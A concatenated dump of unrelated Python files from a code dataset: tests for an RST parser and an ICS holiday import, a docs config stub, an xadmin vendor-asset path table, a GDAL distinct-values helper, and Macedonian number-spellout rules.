eq_(ret,
{'title': 'The Title',
'body': ('<div class="section" id="this-is-my-blog-post">\n'
'<h1>This is my blog post</h1>\n'
'<p><strong>so amazing</strong></p>\n'
'</div>\n'),
'meta1': 'val1'})
def test_break(self):
fn = self.create_file('entries/blogpost.rst', dedent("""\
The Title
#meta1 val1
first part
.. break::
second part
"""))
ret = rst_parser.parse_rst_file(fn, self.request)
eq_(ret,
{'title': 'The Title',
'summary': '<p>first part</p>\n',
'body': '<p>first part</p>\n<p>second part</p>\n',
'meta1': 'val1'})
|
py | 7dfab593dd1b6b152bba39074d2a2dbd9465fd2b | import os
from app.database.models import Event, User
from app.routers import profile
from sqlalchemy.orm import Session
class TestHolidaysImport:
HOLIDAYS = '/profile/holidays/import'
@staticmethod
def test_import_holidays_page_exists(client):
resp = client.get(TestHolidaysImport.HOLIDAYS)
assert resp.ok
assert b'Import holidays using ics file' in resp.content
def test_get_holidays(self, session: Session, user: User):
current_folder = os.path.dirname(os.path.realpath(__file__))
resource_folder = os.path.join(current_folder, 'resources')
test_file = os.path.join(resource_folder, 'ics_example.txt')
with open(test_file) as file:
ics_content = file.read()
holidays = profile.get_holidays_from_file(ics_content, session)
profile.save_holidays_to_db(holidays, session)
assert len(session.query(Event).all()) == 4
def test_wrong_file_get_holidays(self, session: Session, user: User):
current_folder = os.path.dirname(os.path.realpath(__file__))
resource_folder = os.path.join(current_folder, 'resources')
test_file = os.path.join(resource_folder, 'wrong_ics_example.txt')
with open(test_file) as file:
ics_content = file.read()
holidays = profile.get_holidays_from_file(ics_content, session)
profile.save_holidays_to_db(holidays, session)
assert len(session.query(Event).all()) == 0
|
py | 7dfab5a1178b562ed9b2af5e33097dc52c617c96 | """
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/app2"
# docs_base_url = "https://[org_name].github.io/app2"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
context.brand_html = "App2"
|
py | 7dfab711a785edd9fa0964fa0762b2fb598b2a6c |
vendors = {
"bootstrap": {
'js': {
'dev': 'xadmin/vendor/bootstrap/js/bootstrap.js',
'production': 'xadmin/vendor/bootstrap/js/bootstrap.min.js',
'cdn': 'http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js'
},
'css': {
'dev': 'xadmin/vendor/bootstrap/css/bootstrap.css',
'production': 'xadmin/vendor/bootstrap/css/bootstrap.css',
'cdn': 'http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css'
},
'responsive': {'css':{
'dev': 'xadmin/vendor/bootstrap/bootstrap-responsive.css',
'production': 'xadmin/vendor/bootstrap/bootstrap-responsive.css'
}}
},
'jquery': {
"js": {
'dev': 'xadmin/vendor/jquery/jquery.js',
'production': 'xadmin/vendor/jquery/jquery.min.js',
}
},
'jquery-ui-effect': {
"js": {
'dev': 'xadmin/vendor/jquery-ui/jquery.ui.effect.js',
'production': 'xadmin/vendor/jquery-ui/jquery.ui.effect.min.js'
}
},
'jquery-ui-sortable': {
"js": {
'dev': [
'xadmin/vendor/jquery-ui/jquery.ui.sortable.js'
],
'production': [
'xadmin/vendor/jquery-ui/jquery.ui.sortable.min.js'
]
}
},
"font-awesome": {
"css": {
'dev': 'xadmin/vendor/font-awesome/css/font-awesome.css',
'production': 'xadmin/vendor/font-awesome/css/font-awesome.min.css',
}
},
"timepicker": {
"css": {
'dev': 'xadmin/vendor/bootstrap-timepicker/css/bootstrap-timepicker.css',
'production': 'xadmin/vendor/bootstrap-timepicker/css/bootstrap-timepicker.min.css',
},
"js": {
'dev': 'xadmin/vendor/bootstrap-timepicker/js/bootstrap-timepicker.js',
'production': 'xadmin/vendor/bootstrap-timepicker/js/bootstrap-timepicker.min.js',
}
},
"clockpicker": {
"css": {
'dev': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.css',
'production': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.min.css',
},
"js": {
'dev': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.js',
'production': 'xadmin/vendor/bootstrap-clockpicker/bootstrap-clockpicker.min.js',
}
},
"datepicker": {
"css": {
'dev': 'xadmin/vendor/bootstrap-datepicker/css/datepicker.css'
},
"js": {
'dev': 'xadmin/vendor/bootstrap-datepicker/js/bootstrap-datepicker.js',
}
},
"flot": {
"js": {
'dev': ['xadmin/vendor/flot/jquery.flot.js', 'xadmin/vendor/flot/jquery.flot.pie.js', 'xadmin/vendor/flot/jquery.flot.time.js',
'xadmin/vendor/flot/jquery.flot.resize.js','xadmin/vendor/flot/jquery.flot.aggregate.js','xadmin/vendor/flot/jquery.flot.categories.js']
}
},
"image-gallery": {
"css": {
'dev': 'xadmin/vendor/bootstrap-image-gallery/css/bootstrap-image-gallery.css',
'production': 'xadmin/vendor/bootstrap-image-gallery/css/bootstrap-image-gallery.css',
},
"js": {
'dev': ['xadmin/vendor/load-image/load-image.js', 'xadmin/vendor/bootstrap-image-gallery/js/bootstrap-image-gallery.js'],
'production': ['xadmin/vendor/load-image/load-image.min.js', 'xadmin/vendor/bootstrap-image-gallery/js/bootstrap-image-gallery.js']
}
},
"select": {
"css": {
'dev': ['xadmin/vendor/select2/select2.css', 'xadmin/vendor/selectize/selectize.css', 'xadmin/vendor/selectize/selectize.bootstrap3.css'],
},
"js": {
'dev': ['xadmin/vendor/selectize/selectize.js', 'xadmin/vendor/select2/select2.js', 'xadmin/vendor/select2/select2_locale_%(lang)s.js'],
'production': ['xadmin/vendor/selectize/selectize.min.js', 'xadmin/vendor/select2/select2.min.js', 'xadmin/vendor/select2/select2_locale_%(lang)s.js']
}
},
"multiselect": {
"css": {
'dev': 'xadmin/vendor/bootstrap-multiselect/css/bootstrap-multiselect.css',
},
"js": {
'dev': 'xadmin/vendor/bootstrap-multiselect/js/bootstrap-multiselect.js',
}
},
"snapjs": {
"css": {
'dev': 'xadmin/vendor/snapjs/snap.css',
},
"js": {
'dev': 'xadmin/vendor/snapjs/snap.js',
}
},
}
|
py | 7dfab7a3403fcee5a997284903558ab259a327df | # Function to get unique values from an attribute field.
def get_unique(datasource, layer_name, field_name):
sql = 'SELECT DISTINCT {0} FROM {1}'.format(field_name, layer_name)
lyr = datasource.ExecuteSQL(sql)
values = []
for row in lyr:
values.append(row.GetField(field_name))
datasource.ReleaseResultSet(lyr)
return values
|
py | 7dfab8c615a5d699a002304b4c569b19b8fb4aa3 | info = {
"%spellout-cardinal-feminine": {
"0": "нула;",
"1": "една;",
"2": "две;",
"(3, 19)": "=%spellout-cardinal-masculine=;",
"(20, 29)": "дваесет[ и >>];",
"(30, 39)": "триесет[ и >>];",
"(40, 49)": "четириесет[ и >>];",
"(50, 59)": "педесет[ и >>];",
"(60, 69)": "шеесет[ и >>];",
"(70, 79)": "седумдесет[ и >>];",
"(80, 89)": "осумдесет[ и >>];",
"(90, 99)": "деведесет[ и >>];",
"(100, 999)": "<%spellout-cardinal-feminine<сто[ >>];",
"(1000, 999999)": "<%spellout-cardinal-feminine< илјада[ >>];",
"(1000000, 999999999)": "<%spellout-cardinal-masculine< милион[ >>];",
"(1000000000, 999999999999)": "<%spellout-cardinal-masculine< милијарда[ >>];",
"(1000000000000, 999999999999999)": "<%spellout-cardinal-masculine< билион[ >>];",
"(1000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< билијарда[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-cardinal-masculine": {
"0": "нула;",
"1": "еден;",
"2": "два;",
"3": "три;",
"4": "четири;",
"5": "пет;",
"6": "шест;",
"7": "седум;",
"8": "осум;",
"9": "девет;",
"10": "десет;",
"11": "единаесет;",
"12": "дванаесет;",
"13": "тринаесет;",
"14": "четиринаесет;",
"15": "петнаесет;",
"16": "шеснаесет;",
"17": "седумнаесет;",
"18": "осумнаесет;",
"19": "деветнаесет;",
"(20, 29)": "дваесет[ и >>];",
"(30, 39)": "триесет[ и >>];",
"(40, 49)": "четириесет[ и >>];",
"(50, 59)": "педесет[ и >>];",
"(60, 69)": "шеесет[ и >>];",
"(70, 79)": "седумдесет[ и >>];",
"(80, 89)": "осумдесет[ и >>];",
"(90, 99)": "деведесет[ и >>];",
"(100, 999)": "<%spellout-cardinal-feminine<сто[ >>];",
"(1000, 999999)": "<%spellout-cardinal-feminine< илјада[ >>];",
"(1000000, 999999999)": "<%spellout-cardinal-masculine< милион[ >>];",
"(1000000000, 999999999999)": "<%spellout-cardinal-masculine< милијарда[ >>];",
"(1000000000000, 999999999999999)": "<%spellout-cardinal-masculine< билион[ >>];",
"(1000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< билијарда[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-cardinal-neuter": {
"0": "нула;",
"1": "едно;",
"2": "два;",
"(3, 19)": "=%spellout-cardinal-masculine=;",
"(20, 29)": "дваесет[ и >>];",
"(30, 39)": "триесет[ и >>];",
"(40, 49)": "четириесет[ и >>];",
"(50, 59)": "педесет[ и >>];",
"(60, 69)": "шеесет[ и >>];",
"(70, 79)": "седумдесет[ и >>];",
"(80, 89)": "осумдесет[ и >>];",
"(90, 99)": "деведесет[ и >>];",
"(100, 999)": "<%spellout-cardinal-feminine<сто[ >>];",
"(1000, 999999)": "<%spellout-cardinal-feminine< илјада[ >>];",
"(1000000, 999999999)": "<%spellout-cardinal-masculine< милион[ >>];",
"(1000000000, 999999999999)": "<%spellout-cardinal-masculine< милијарда[ >>];",
"(1000000000000, 999999999999999)": "<%spellout-cardinal-masculine< билион[ >>];",
"(1000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< билијарда[ >>];",
"(1000000000000000000, 'inf')": "=#,##0=;"
},
"%spellout-numbering": {
"(0, 'inf')": "=%spellout-cardinal-masculine=;"
},
"%spellout-numbering-year": {
"(0, 'inf')": "=%spellout-numbering=;"
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.